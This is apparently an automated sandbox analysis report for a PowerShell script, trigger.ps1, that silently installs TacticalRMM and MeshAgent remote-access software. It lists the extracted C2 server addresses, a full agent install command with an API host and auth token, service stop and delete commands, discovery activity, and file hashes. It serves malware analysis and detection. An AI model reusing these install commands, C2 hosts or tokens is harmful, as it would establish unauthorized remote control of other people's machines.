Analysis

  • max time kernel
    42s
  • max time network
    43s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/10/2024, 22:23

General

  • Target

    trigger.ps1

  • Size

    3KB

  • MD5

    576d6b372baf6121e274938f8127781f

  • SHA1

    34b78b384576ab0878926631e2153384347d457b

  • SHA256

    9b58dacfd08396c0277df70e69cdc714c0491bde5bca36abb44a5e9823cf2038

  • SHA512

    18af91035fc0bc3064e35442ee43eae2bd30cc199a28b1aff30446f5341ca84cc138c544cbe2c8293135dff0696b5dc3d4dbab28e0250dc3fe21b73cd3f87529

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.golden9ine.com:443/agent.ashx

Attributes
  • mesh_id

    0xEA78AEAE55808B865A9C391FE30E864BF999ABE7C9922661A6F7B3E8F3E576EAE447E62C685CAA33E1A0C5A8930D2A9A

  • server_id

    2312E6BFD45A8F95C0EA1F57EF35B9AC829501E0AAC9A43D5D61184CB20D8054BFAE1CD803F9AB8B14690E62EA816A8D

  • wss

    wss://mesh.golden9ine.com:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Users\Admin\AppData\Local\Temp\tacticalagent-v2.8.0-windows-amd64.exe
      "C:\Users\Admin\AppData\Local\Temp\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4560
      • C:\Users\Admin\AppData\Local\Temp\is-5CP8M.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-5CP8M.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$B00D6,3652845,825344,C:\Users\Admin\AppData\Local\Temp\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3656
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:4476
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2624
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1048
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3620
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2444
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:5104
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:5084
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:5088
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1060
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4280
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2940
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4512
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2996
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4908
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3628
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4156
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3872
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2288
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.golden9ine.com --client-id 1 --site-id 4 --agent-type server --auth 5fa7d36fa89cca10aad217108d4831fb653747b7772105b96e71df0721efc075 --silent
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4836
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:968
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    PID:5088
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1468
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4908
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:800
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:2416
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:3484
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:3428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4284

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Mesh Agent\MeshAgent.db.tmp

          Filesize

          146KB

          MD5

          eb548580b51880138c17ba39a9308f33

          SHA1

          eec777381d6c8e1e24e9e4e7cd130e4ba75762ab

          SHA256

          fe130c6596900d904a4caec76f80a8460530e6fdb26f0d212f759c3e90a42577

          SHA512

          45c9a3d7350b60794080e39ee359a0ce0a38b8dc774c090f7cbb3816e0434d5bfeea35a3429b2ea97bb1d34be4c5c06b98262436888067b90496762456624958

        • C:\Program Files\TacticalAgent\meshagent.exe

          Filesize

          3.3MB

          MD5

          890a8b4eb8315a5fd443d15750f10d05

          SHA1

          b0a55b2973c5260799e7c1baf62020e2594f1e96

          SHA256

          53d0032928460340a8cb22c67662da8df498a31004ebd97ad91ff358a3c78bd0

          SHA512

          621ecb9ecdc21f04a48d3af608313be9dee8b327a32d431b886d3ada7b24b0e13594950068efae6547c87e771f3a21d6ecd47b222957f1fc2730c2cf891c57ac

        • C:\Program Files\TacticalAgent\tacticalrmm.exe

          Filesize

          9.2MB

          MD5

          6cfbd2da5f304a3b8972eafe6fe4d191

          SHA1

          09c1600064cb9d157c55c88f76f107373404b2ae

          SHA256

          ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069

          SHA512

          03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yt1vb4tk.p10.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\is-5CP8M.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

          Filesize

          3.0MB

          MD5

          a639312111d278fee4f70299c134d620

          SHA1

          6144ca6e18a5444cdb9b633a6efee67aff931115

          SHA256

          4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

          SHA512

          f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

        • C:\Users\Admin\AppData\Local\Temp\tacticalagent-v2.8.0-windows-amd64.exe

          Filesize

          4.3MB

          MD5

          ed40540e7432bacaa08a6cd6a9f63004

          SHA1

          9c12db9fd406067162e9a01b2c6a34a5c360ea97

          SHA256

          d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

          SHA512

          07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

        • C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\650817AF471CBC5C359E2626DFDFE72EC995381A

          Filesize

          1KB

          MD5

          9b88af8605f0f6dcfa4273bd397c74fa

          SHA1

          5c4785d838fc8813fadba50cfd61808c92aef220

          SHA256

          5f5088d0287cd2ac042daa13cc6e2f04b7eaf9a23989a5e03d82cfbe64b4c5d9

          SHA512

          02d1366b5eccf3360cdd98092588310b9c6e1c42fd620ec340f83259aa2dc2f0089fa38737f6a8b4324d9bced07eb1b91b50819e160ef486366ef2ad18fc8e35

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          06d16fea6ab505097d16fcaa32949d47

          SHA1

          0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

          SHA256

          54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

          SHA512

          03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          2KB

          MD5

          2c0bdf06d302688498d4e7f9cd669ab5

          SHA1

          18186323d93499e03f737f137b4ad795eb7f470b

          SHA256

          86cd6b95819282eee4bd6c900b27ebeddf453a90a9f6147978e9137479f36bd6

          SHA512

          f8f02ab1cb6906975695369183d00d7f25ec4c54c40aba5ac0a1f42312c5eff5a6774a8e84c3357415555405f7e9754deebe8335dd1fdcf693137ab044cc18fe

        • memory/1472-12-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-17-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-16-0x0000025C7D660000-0x0000025C7D87C000-memory.dmp

          Filesize

          2.1MB

        • memory/1472-15-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-14-0x00007FFDC0AB3000-0x00007FFDC0AB5000-memory.dmp

          Filesize

          8KB

        • memory/1472-13-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-71-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-0-0x00007FFDC0AB3000-0x00007FFDC0AB5000-memory.dmp

          Filesize

          8KB

        • memory/1472-11-0x00007FFDC0AB0000-0x00007FFDC1571000-memory.dmp

          Filesize

          10.8MB

        • memory/1472-10-0x0000025C7D980000-0x0000025C7D9A2000-memory.dmp

          Filesize

          136KB

        • memory/2032-95-0x0000025ECA840000-0x0000025ECA884000-memory.dmp

          Filesize

          272KB

        • memory/2032-96-0x0000025ECAEE0000-0x0000025ECAF56000-memory.dmp

          Filesize

          472KB

        • memory/3656-49-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/3656-36-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/4284-127-0x000001A475560000-0x000001A47557C000-memory.dmp

          Filesize

          112KB

        • memory/4284-128-0x000001A475640000-0x000001A4756F5000-memory.dmp

          Filesize

          724KB

        • memory/4284-129-0x000001A4754E0000-0x000001A4754EA000-memory.dmp

          Filesize

          40KB

        • memory/4284-130-0x000001A475580000-0x000001A47559C000-memory.dmp

          Filesize

          112KB

        • memory/4560-50-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/4560-29-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/4560-32-0x0000000000401000-0x00000000004B7000-memory.dmp

          Filesize

          728KB